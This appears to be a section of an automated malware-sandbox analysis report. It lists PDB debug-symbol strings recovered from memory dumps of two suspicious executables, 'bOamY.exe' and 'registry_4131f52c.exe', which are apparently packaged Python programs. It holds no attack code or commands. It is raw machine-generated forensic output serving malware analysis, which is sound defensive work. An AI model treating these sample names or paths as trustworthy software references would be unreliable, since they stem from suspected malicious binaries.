Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2311310619.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403419464.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317125984.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417579847.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314838665.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407471496.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: C:\A\31\b\bin\amd64\_asyncio.pdb source: bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3395542401.00007FFDA5547000.00000002.00000001.01000000.0000001D.sdmp, registry_4131f52c.exe, 00000017.00000003.2398583148.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395442580.00007FFDA3BF7000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdb source: bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3397585222.00007FFDA581D000.00000002.00000001.01000000.00000012.sdmp, registry_4131f52c.exe, 00000017.00000003.2400747889.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395622073.00007FFDA3C2D000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2315984163.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408655566.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312703598.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405878142.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.23.dr
Source: Binary string: C:\A\31\b\bin\amd64\_socket.pdb source: bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3396905216.00007FFDA55E9000.00000002.00000001.01000000.00000013.sdmp, registry_4131f52c.exe, 00000017.00000003.2402485480.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3396266893.00007FFDA4339000.00000002.00000001.01000000.00000028.sdmp, _socket.pyd.15.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317780907.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418440641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2320923162.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420688942.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2313340825.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406237358.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb.Pdbr source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312581468.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405712741.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\python38.pdb source: bOamY.exe, 00000010.00000002.3393855734.00007FFD84024000.00000002.00000001.01000000.0000000C.sdmp, registry_4131f52c.exe, 00000018.00000002.3393911083.00007FFD83784000.00000002.00000001.01000000.00000021.sdmp, python38.dll.23.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2313586504.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406407641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb** source: pywintypes38.dll.23.dr, pywintypes38.dll.15.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316950781.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417424650.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdbMM source: bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3397585222.00007FFDA581D000.00000002.00000001.01000000.00000012.sdmp, registry_4131f52c.exe, 00000017.00000003.2400747889.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395622073.00007FFDA3C2D000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: bOamY.exe, 0000000F.00000003.2316723898.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417301947.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_ctypes.pdb source: bOamY.exe, 00000010.00000002.3399384168.00007FFDAC102000.00000002.00000001.01000000.0000000F.sdmp, registry_4131f52c.exe, 00000018.00000002.3397344065.00007FFDA46F2000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32wnet.pdb source: bOamY.exe, 0000000F.00000003.2345919215.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2432144564.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314838665.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407471496.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.15.dr
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1g 21 Apr 2020built on: Fri Jun 12 19:40:20 2020 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: bOamY.exe, 00000010.00000002.3393241408.00007FFD83C27000.00000002.00000001.01000000.00000017.sdmp, registry_4131f52c.exe, 00000018.00000002.3393321366.00007FFD83387000.00000002.00000001.01000000.0000002C.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_queue.pdb source: bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3396143411.00007FFDA55A3000.00000002.00000001.01000000.00000019.sdmp, registry_4131f52c.exe, 00000017.00000003.2402149033.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3396581823.00007FFDA4633000.00000002.00000001.01000000.0000002E.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: bOamY.exe, 0000000F.00000003.2314452068.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407019715.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -c are executed after commands from .pdbrc files. source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316376608.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2409520861.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2320591915.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420550051.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: bOamY.exe, 0000000F.00000003.2315769153.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407806029.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2311807566.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405381148.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314297640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406875328.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314452068.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407019715.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314730096.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407332641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
Source: Binary string: d:\agent\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: bOamY.exe, 0000000F.00000003.2308245690.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2397643504.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316188640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408904329.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.23.dr
Source: Binary string: Initial commands are read from .pdbrc files in your home directory source: bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_ssl.pdb source: bOamY.exe, 00000010.00000002.3396382351.00007FFDA55BD000.00000002.00000001.01000000.00000015.sdmp, registry_4131f52c.exe, 00000018.00000002.3395195451.00007FFDA388D000.00000002.00000001.01000000.0000002A.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2311310619.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403419464.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318617941.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420081483.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2321357657.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420845388.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt_rust.pdb source: _bcrypt.pyd.23.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316544727.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2410381367.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314047620.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406701336.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: If a file ".pdbrc" exists in: source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316188640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408904329.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318104601.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419450800.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2320591915.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420550051.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318266888.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419793049.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.23.dr
Source: Binary string: d:\agent\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: bOamY.exe, 0000000F.00000003.2304551538.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3399640942.00007FFDAC140000.00000002.00000001.01000000.0000000D.sdmp, registry_4131f52c.exe, 00000017.00000003.2396862133.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3399041087.00007FFDA54C0000.00000002.00000001.01000000.00000022.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314582506.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407183726.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2320161253.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420387407.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: placed in the .pdbrc file): source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_overlapped.pdb source: bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3395372219.00007FFDA5535000.00000002.00000001.01000000.0000001E.sdmp, registry_4131f52c.exe, 00000017.00000003.2401213950.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3395836204.00007FFDA3EB5000.00000002.00000001.01000000.00000033.sdmp
Source: Binary string: If a file ".pdbrc" exists in your home directory or in the current source: bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390948651.0000018B97074000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317283892.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417805410.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316544727.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2410381367.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2313821127.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406546498.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318488555.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419930594.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2313586504.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406407641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314973975.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407655702.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2312471386.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405565066.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2312703598.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405878142.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2312581468.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405712741.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2316723898.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417301947.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317618285.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418243892.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318617941.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420081483.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317283892.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417805410.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2311629969.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403688770.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: bOamY.exe, 00000010.00000002.3394841160.00007FFDA35C4000.00000002.00000001.01000000.00000016.sdmp, registry_4131f52c.exe, 00000018.00000002.3394805949.00007FFD93324000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312471386.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2405565066.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\pyexpat.pdb source: pyexpat.pyd.23.dr
Source: Binary string: ucrtbase.pdbUGP source: bOamY.exe, 00000010.00000002.3395178924.00007FFDA3974000.00000002.00000001.01000000.0000000B.sdmp, registry_4131f52c.exe, 00000018.00000002.3394559411.00007FFD83984000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2317618285.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418243892.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2320161253.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420387407.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: bOamY.exe, 00000010.00000002.3394841160.00007FFDA35C4000.00000002.00000001.01000000.00000016.sdmp, registry_4131f52c.exe, 00000018.00000002.3394805949.00007FFD93324000.00000002.00000001.01000000.0000002B.sdmp
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2315984163.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2408655566.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2312817260.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406050971.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: bOamY.exe, 00000010.00000002.3393241408.00007FFD83C27000.00000002.00000001.01000000.00000017.sdmp, registry_4131f52c.exe, 00000018.00000002.3393321366.00007FFD83387000.00000002.00000001.01000000.0000002C.sdmp
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2311629969.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2403688770.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317465589.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2418017150.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcrypt_rust.pdbD source: _bcrypt.pyd.23.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2318488555.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419930594.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314047620.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406701336.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2318266888.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2419793049.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2321357657.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2420845388.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\select.pdb source: bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3398021274.00007FFDA5B93000.00000002.00000001.01000000.00000014.sdmp, registry_4131f52c.exe, 00000017.00000003.2430566039.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3397663069.00007FFDA4DA3000.00000002.00000001.01000000.00000029.sdmp, select.pyd.15.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2317125984.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2417579847.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.15.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2316376608.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2409520861.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: bOamY.exe, 0000000F.00000003.2313340825.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406237358.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbrc source: bOamY.exe, 00000010.00000002.3391793141.000001E4F6B80000.00000004.00001000.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3391082592.000001E4F686C000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3391611067.0000018B973B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: bOamY.exe, 0000000F.00000003.2314297640.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2406875328.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.23.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: bOamY.exe, 0000000F.00000003.2314730096.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2407332641.0000014CAE213000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.15.dr
